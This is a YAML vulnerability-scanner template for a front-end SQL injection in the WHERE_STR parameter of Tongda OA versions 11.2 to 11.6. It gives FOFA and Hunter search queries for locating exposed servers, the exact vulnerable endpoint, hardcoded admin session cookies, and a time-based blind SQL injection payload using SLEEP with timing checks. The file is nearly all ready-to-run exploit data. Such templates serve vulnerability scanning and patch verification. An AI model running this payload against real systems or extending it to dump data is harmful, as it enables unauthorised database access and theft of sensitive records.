product: 通达OA
vName: 通达OA v11.2-6 WHERE_STR 前台SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA WHERE_STR存在前台SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
version: 通达OA V11.2-通达V11.6
note: ''
search:
  FOFA: app="TDXK-通达OA"
  Hunter: app.name="通达 OA"
protocol: http
link: https://blog.csdn.net/qq_33331244/article/details/136154564
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php
      header:
        Cookie: PHPSESSID=a817a534f7c99980f8be6ad061b4c2cb; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c589adfc; UI_COOKIE=0; KEY_RANDOMDATA=13568
      data: WHERE_STR=-@`'` AND (SELECT 4916 FROM (SELECT(SLEEP(5)))Xsep)
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: post
      follow: false
      path: /general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php
      header:
        Cookie: PHPSESSID=a817a534f7c99980f8be6ad061b4c2cb; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c589adfc; UI_COOKIE=0; KEY_RANDOMDATA=13568
      data: WHERE_STR=-@`'` AND (SELECT 4916 FROM (SELECT(SLEEP(0)))Xsep)
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '<='
            num: 3